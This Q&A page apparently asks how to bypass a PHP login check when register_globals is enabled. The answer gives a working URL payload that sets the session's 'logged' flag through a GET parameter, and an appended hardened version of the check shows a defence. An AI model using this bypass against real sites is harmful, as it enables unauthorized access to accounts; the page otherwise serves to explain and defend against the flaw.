
register_globals exploit session array


I have a PHP script that executes some commands to verify that a user is logged in.

// Login check as posted: $password and $hidden_password are plain global variables.
if ((isset($password) && $password != "" && auth($password, $hidden_password) == 1) || (is_array($_SESSION) && $_SESSION["logged"] == 1)) {
    $aff = display("you're logged in");
} else {
    $aff = display("you're not logged in");
}

If register_globals is set to 1 in my php.ini, and I want to inject something into the URL to get authenticated every time, whatever the password is, what can I do?

I already tried:

  • site.com/page.php?password=pass&logged=1
  • site.com/page.php?password=pass&_SESSION["logged"]=array("1")
  • site.com/page.php?password=pass&hidden_password=pass ==> returns "you're not logged in" but the thing is that I don't want to overwrite the Hidden_Password (I need it!)
  • I also tried to play with cookies and other HTTP headers, but with no results

Any hints?


Solution

  • Just tried site.php?_SESSION[logged]=1, and it works!

    You can modify globals when register_globals is set to 1, using the GET method.

    So yes, don't ever edit this option, if you're sure about it ;)
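
A hardened form of the check from the question, as an added example that is not part of the original post or answer: it reads the password only from the POST body, takes the session flag only from the server-side session array, and refuses to run while register_globals is on. The names `is_logged_in` and `register_globals_enabled`, the stand-in for `auth()`, and the sample values are assumptions made for illustration; it also assumes the login code stores the integer 1 in `$_SESSION["logged"]`.

```php
<?php
// Added example (not from the original post). auth() is the question's own
// function; its body is not shown on the page, so it is passed in as a callable.

/** True when the legacy register_globals directive is switched on. */
function register_globals_enabled(): bool
{
    // ini_get() returns false on PHP versions where the directive no longer exists.
    return filter_var(ini_get('register_globals'), FILTER_VALIDATE_BOOLEAN);
}

/**
 * Decide login state from explicitly named sources only.
 * $post    : copy of $_POST
 * $session : copy of $_SESSION taken after session_start()
 */
function is_logged_in(array $post, array $session, string $hiddenPassword, callable $auth): bool
{
    // Session flag: must exist and be exactly the integer 1 (assumed stored type).
    if (isset($session['logged']) && $session['logged'] === 1) {
        return true;
    }
    // Password: only from the POST body, and only if it is a non-empty string.
    $password = $post['password'] ?? null;
    if (!is_string($password) || $password === '') {
        return false;
    }
    return $auth($password, $hiddenPassword) === 1;
}

// --- constructed sample input ---
// Stand-in for the page's auth(); a constant-time string comparison is assumed.
$auth = function (string $p, string $h): int { return hash_equals($h, $p) ? 1 : 0; };
$hidden = 'constructed-secret';

if (register_globals_enabled()) {
    exit("register_globals is enabled; refusing to run\n"); // fail closed
}

// A request parameter named _SESSION stays in the request array; it is never
// copied into $session, and a wrong password fails the auth() check.
$forged = ['_SESSION' => ['logged' => '1'], 'password' => 'pass'];
var_dump(is_logged_in($forged, [], $hidden, $auth));                 // forged flag, wrong password
var_dump(is_logged_in([], ['logged' => 1], $hidden, $auth));         // genuine server-side session
var_dump(is_logged_in(['password' => $hidden], [], $hidden, $auth)); // correct password
```

In a real page the two arrays would be `$_POST` and `$_SESSION`, read after `session_start()`.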